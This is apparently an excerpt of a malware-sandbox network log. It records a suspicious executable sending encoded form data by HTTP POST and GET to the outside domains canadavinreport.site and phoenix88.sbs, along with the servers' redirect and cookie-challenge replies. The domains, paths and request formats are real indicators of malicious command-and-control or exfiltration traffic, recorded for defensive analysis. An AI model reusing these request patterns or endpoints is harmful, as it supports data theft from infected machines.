87 d0 ee [TRUNCATED]
                                                  Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc|`,<pwm0$QAMKqwx[Z1M$F~~n_{9|.w>|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~gi^S0mfp)92v-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1FIe\{^brh@/teGHSK$jK#R*T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49794 | 185.27.134.206 | 80 | 2648 | C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:51:04.411801100 CET | 1834 | OUT | POST /4d2l/ HTTP/1.1
                                                  Host: www.canadavinreport.site
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.canadavinreport.site
                                                  Content-Length: 1239
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.canadavinreport.site/4d2l/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 55 45 70 4a 2b 38 42 77 62 64 33 52 52 70 6f 58 74 67 49 4b 74 6d 77 74 50 5a 65 75 52 67 4a 68 37 39 41 2f 4e 2f 4e 47 42 5a 6e 38 31 5a 76 54 47 36 77 70 68 6c 50 46 57 51 6c 6d 42 72 75 54 70 78 2f 50 71 68 36 2f 6b 31 31 38 59 30 4c 66 32 50 70 4e 4d 5a 30 36 79 4f 4c 4f 62 55 64 63 74 58 39 63 4b 62 5a 32 37 48 72 38 64 63 4a 4c 2f 2b 39 70 33 31 33 6c 75 59 50 69 65 75 67 6a 69 69 33 75 6f 6f 63 49 70 48 46 41 55 79 55 64 64 59 4e 4d 54 69 62 49 71 4f 42 54 6c 61 67 32 50 6b 61 38 6a 59 79 74 61 52 46 32 37 68 6b 33 6b 77 57 33 75 33 34 59 63 57 41 66 54 48 42 50 68 77 49 75 48 65 45 35 48 53 4e 74 52 51 79 70 36 6e 7a 54 68 53 67 6c 75 4d 61 5a 39 56 30 71 49 7a 6a 4e 77 76 5a 55 2f 74 39 6d 64 55 63 77 4d 48 6a 32 69 53 74 6c 73 6c 4d 6f 57 31 44 50 4f 4a 69 50 48 44 6e 6a 65 54 35 67 72 73 31 47 74 74 38 51 4a 33 73 51 2f 61 36 55 79 6d 56 50 74 61 36 75 52 77 4f 7a 33 6c 44 61 38 67 4b 7a 57 42 70 33 74 6a 38 7a 58 46 52 54 39 55 6a 49 72 33 38 6c 46 6e 50 6f 5a 61 78 39 5a 52 7a [TRUNCATED]
                                                  Data Ascii: KX=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 [TRUNCATED]
Dec 14, 2024 13:51:05.643049955 CET | 683 | IN | HTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Sat, 14 Dec 2024 12:51:05 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                  Cache-Control: no-cache
                                                  Content-Encoding: br
                                                  Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c 67 69 5e 08 53 30 6d 99 66 85 70 dc 29 96 a6 39 17 32 cb ac 76 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 87 d0 ee [TRUNCATED]
                                                  Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc|`,<pwm0$QAMKqwx[Z1M$F~~n_{9|.w>|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~gi^S0mfp)92v-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1FIe\{^brh@/teGHSK$jK#R*T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49800 | 185.27.134.206 | 80 | 2648 | C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:51:07.082458973 CET | 532 | OUT | GET /4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMZMG6cjSawY9sklYa6FSt3/cXLdoz7lp+06E84XgU+l17w== HTTP/1.1
                                                  Host: www.canadavinreport.site
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.5
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Timestamp: Dec 14, 2024 13:51:08.315129995 CET | Bytes transferred: 1200 | Direction: IN | Data:
                                                  HTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Sat, 14 Dec 2024 12:51:08 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 999
                                                  Connection: close
                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                  Cache-Control: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                  Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("432479d75ce5c579f6fb522469a33ecf");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMZMG6cjSawY9sklYa6FSt3/cXLdoz7lp+06E84XgU+l17w==&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                  Session ID: 9 | Source IP: 192.168.2.8 | Source Port: 49815 | Destination IP: 88.99.61.52 | Destination Port: 80 | PID: 2648 | Process: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  Timestamp: Dec 14, 2024 13:51:14.579996109 CET | Bytes transferred: 776 | Direction: OUT | Data:
                                                  POST /ogj2/ HTTP/1.1
                                                  Host: www.phoenix88.sbs
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.phoenix88.sbs
                                                  Content-Length: 203
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.phoenix88.sbs/ogj2/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 46 2f 34 49 70 6a 72 32 4e 42 30 48 51 42 66 42 38 72 45 6b 4d 6f 31 55 50 31 79 33 75 46 5a 67 65 34 78 6c 49 50 70 59 43 35 38 38 76 6f 36 42 31 31 59 36 76 4f 51 43 6c 64 44 71 37 63 44 6f 74 62 63 62 68 33 71 4d 32 54 7a 62 34 4f 4e 34 37 56 49 38 51 38 6a 58 54 30 48 7a 49 48 44 78 4e 2b 6e 71 41 48 6c 7a 51 45 57 2b 52 42 71 79 6c 53 30 63 2b 45 48 78 44 46 57 52 49 6e 36 6e 4c 4f 38 65 44 74 77 46 4e 55 77 63 64 76 2b 52 53 48 6f 58 6f 4b 38 79 6d 61 73 42 48 2f 68 77 36 61 43 51 45 38 71 65 6d 49 45 7a 49 53 41 53 4c 4e 38 6f 35 6e 42 6e 31 61 42 5a 76 37 47 78 69 7a 31 47 74 6c 38 3d
                                                  Data Ascii: KX=F/4Ipjr2NB0HQBfB8rEkMo1UP1y3uFZge4xlIPpYC588vo6B11Y6vOQCldDq7cDotbcbh3qM2Tzb4ON47VI8Q8jXT0HzIHDxN+nqAHlzQEW+RBqylS0c+EHxDFWRIn6nLO8eDtwFNUwcdv+RSHoXoK8ymasBH/hw6aCQE8qemIEzISASLN8o5nBn1aBZv7Gxiz1Gtl8=
                                                  Timestamp: Dec 14, 2024 13:51:15.940464973 CET | Bytes transferred: 1020 | Direction: IN | Data:
                                                  HTTP/1.1 302 Found
                                                  Connection: close
                                                  content-type: text/html
                                                  content-length: 771
                                                  date: Sat, 14 Dec 2024 12:51:15 GMT
                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                  location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                  Session ID: 10 | Source IP: 192.168.2.8 | Source Port: 49821 | Destination IP: 88.99.61.52 | Destination Port: 80 | PID: 2648 | Process: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  Timestamp: Dec 14, 2024 13:51:17.235116959 CET | Bytes transferred: 796 | Direction: OUT | Data:
                                                  POST /ogj2/ HTTP/1.1
                                                  Host: www.phoenix88.sbs
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.phoenix88.sbs
                                                  Content-Length: 223
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.phoenix88.sbs/ogj2/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 46 2f 34 49 70 6a 72 32 4e 42 30 48 43 30 50 42 2f 49 73 6b 4b 49 31 58 41 56 79 33 38 46 59 70 65 34 31 6c 49 4f 74 49 43 4b 59 38 76 4e 65 42 30 78 4d 36 6f 4f 51 43 77 74 44 76 6a 38 44 7a 74 62 59 54 68 33 57 4d 32 54 33 62 34 4c 78 34 6e 79 30 2f 51 73 6a 56 4e 55 48 78 58 58 44 78 4e 2b 6e 71 41 48 5a 56 51 45 4f 2b 52 78 61 79 6b 7a 30 62 33 6b 48 79 54 31 57 52 4d 6e 36 6a 4c 4f 39 4a 44 76 56 59 4e 53 38 63 64 75 4f 52 52 57 6f 55 68 4b 38 30 69 61 74 4e 42 50 6b 59 30 36 47 6e 42 64 57 2f 71 49 34 6f 45 45 78 34 52 76 30 75 36 6e 70 4d 31 5a 70 76 71 4d 62 5a 34 51 6c 32 7a 79 6f 4a 63 37 6c 34 77 35 38 71 72 71 39 6b 69 59 48 6f 33 58 59 41
                                                  Data Ascii: KX=F/4Ipjr2NB0HC0PB/IskKI1XAVy38FYpe41lIOtICKY8vNeB0xM6oOQCwtDvj8DztbYTh3WM2T3b4Lx4ny0/QsjVNUHxXXDxN+nqAHZVQEO+Rxaykz0b3kHyT1WRMn6jLO9JDvVYNS8cduORRWoUhK80iatNBPkY06GnBdW/qI4oEEx4Rv0u6npM1ZpvqMbZ4Ql2zyoJc7l4w58qrq9kiYHo3XYA
                                                  Timestamp: Dec 14, 2024 13:51:18.496782064 CET | Bytes transferred: 1020 | Direction: IN | Data:
                                                  HTTP/1.1 302 Found
                                                  Connection: close
                                                  content-type: text/html
                                                  content-length: 771
                                                  date: Sat, 14 Dec 2024 12:51:18 GMT
                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                  location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                  Session ID: 11 | Source IP: 192.168.2.8 | Source Port: 49829 | Destination IP: 88.99.61.52 | Destination Port: 80 | PID: 2648 | Process: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  Timestamp: Dec 14, 2024 13:51:19.898612976 CET | Bytes transferred: 1813 | Direction: OUT | Data:
                                                  POST /ogj2/ HTTP/1.1
                                                  Host: www.phoenix88.sbs
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.phoenix88.sbs
                                                  Content-Length: 1239
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.phoenix88.sbs/ogj2/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 46 2f 34 49 70 6a 72 32 4e 42 30 48 43 30 50 42 2f 49 73 6b 4b 49 31 58 41 56 79 33 38 46 59 70 65 34 31 6c 49 4f 74 49 43 4b 51 38 73 2f 57 42 31 51 4d 36 70 4f 51 43 73 39 44 75 6a 38 43 68 74 62 67 58 68 33 62 35 32 52 2f 62 35 70 4a 34 72 54 30 2f 62 73 6a 56 46 30 48 79 49 48 44 6f 4e 36 4b 6a 41 42 35 56 51 45 4f 2b 52 33 57 79 6e 69 30 62 37 45 48 78 44 46 57 64 49 6e 36 4c 4c 4f 6b 38 44 76 51 76 4e 69 63 63 63 4f 65 52 65 45 77 55 67 71 38 32 73 36 73 51 42 4f 59 48 30 36 4b 72 42 64 79 5a 71 4c 6f 6f 48 51 67 64 4f 4c 34 34 6d 47 59 2b 32 62 46 5a 6b 4c 32 37 34 44 42 47 75 69 6f 61 62 38 38 56 6c 35 73 39 2b 74 59 51 35 63 62 37 39 51 56 4b 59 7a 62 49 46 59 6d 38 79 54 64 5a 66 63 5a 62 49 64 6e 51 32 34 61 43 4f 6f 6f 74 62 64 62 31 37 4f 39 72 38 65 71 67 4e 33 76 52 65 6a 68 41 37 52 5a 2f 73 67 33 53 66 69 6e 7a 41 38 69 39 32 7a 31 61 79 78 39 42 56 63 42 66 38 72 41 53 34 37 76 31 38 2b 4f 4c 5a 4c 31 71 70 6b 33 33 31 71 73 48 4f 45 67 42 39 44 67 67 39 56 70 63 75 48 63 [TRUNCATED]
                                                  Data Ascii: KX= [TRUNCATED]
                                                  Timestamp: Dec 14, 2024 13:51:21.155148029 CET | Bytes transferred: 1020 | Direction: IN | Data:
                                                  HTTP/1.1 302 Found
                                                  Connection: close
                                                  content-type: text/html
                                                  content-length: 771
                                                  date: Sat, 14 Dec 2024 12:51:20 GMT
                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                  location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                  Session ID: 12 | Source IP: 192.168.2.8 | Source Port: 49836 | Destination IP: 88.99.61.52 | Destination Port: 80 | PID: 2648 | Process: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  Timestamp: Dec 14, 2024 13:51:22.558510065 CET | Bytes transferred: 525 | Direction: OUT | Data:
                                                  GET /ogj2/?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9T9LUB2i2IiSBd7rmeCdeR22hTga1oxsx30/DDEHjEXz3Vw==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1
                                                  Host: www.phoenix88.sbs
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.5
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Timestamp: Dec 14, 2024 13:51:23.825227022 CET | Bytes transferred: 1179 | Direction: IN | Data:
                                                  HTTP/1.1 302 Found
                                                  Connection: close
                                                  content-type: text/html
                                                  content-length: 771
                                                  date: Sat, 14 Dec 2024 12:51:23 GMT
                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                  location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9T9LUB2i2IiSBd7rmeCdeR22hTga1oxsx30/DDEHjEXz3Vw==&2VqtG=K0rLevU0Wh5tIJEp
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>
